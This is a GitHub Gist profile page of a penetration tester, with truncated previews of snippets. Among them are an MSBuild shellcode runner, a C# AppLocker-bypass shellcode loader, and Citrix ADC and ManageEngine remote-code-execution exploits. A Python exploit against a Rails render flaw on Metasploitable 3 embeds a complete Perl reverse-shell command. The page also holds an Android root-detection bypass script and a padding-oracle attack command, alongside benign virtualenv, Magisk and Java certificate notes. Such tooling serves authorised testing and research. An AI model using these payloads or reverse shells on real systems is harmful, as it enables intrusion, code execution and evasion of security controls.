Skip to content

Instantly share code, notes, and snippets.

LongCat pich4ya

Block or report user

Report or block pich4ya

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
pich4ya /
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
# @author Pichaya Morimoto (
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = ""
cmd = "perl -e 'use Socket;$i=\"\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
pich4ya /
Created Jan 19, 2020 — forked from 0x09AL/
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/"
pich4ya /
Last active Nov 29, 2019
วิธีการไม่ trust all HTTPS cert เวลาต่อ internal API ที่ API server ใช้ cert ที่ issue มาจาก internal root CA
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget -O ca.pem
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f --no-pause
// CHANGELOG by Pichaya Morimoto (
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by:
// If this isn't working in the future, check console logs, rootbeer src, or
Java.perform(function() {
var RootPackages = ["", "", "eu.chainfire.supersu",
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
View padbuster_macos2019.txt
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone && cd PadBuster
perl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
You can’t perform that action at this time.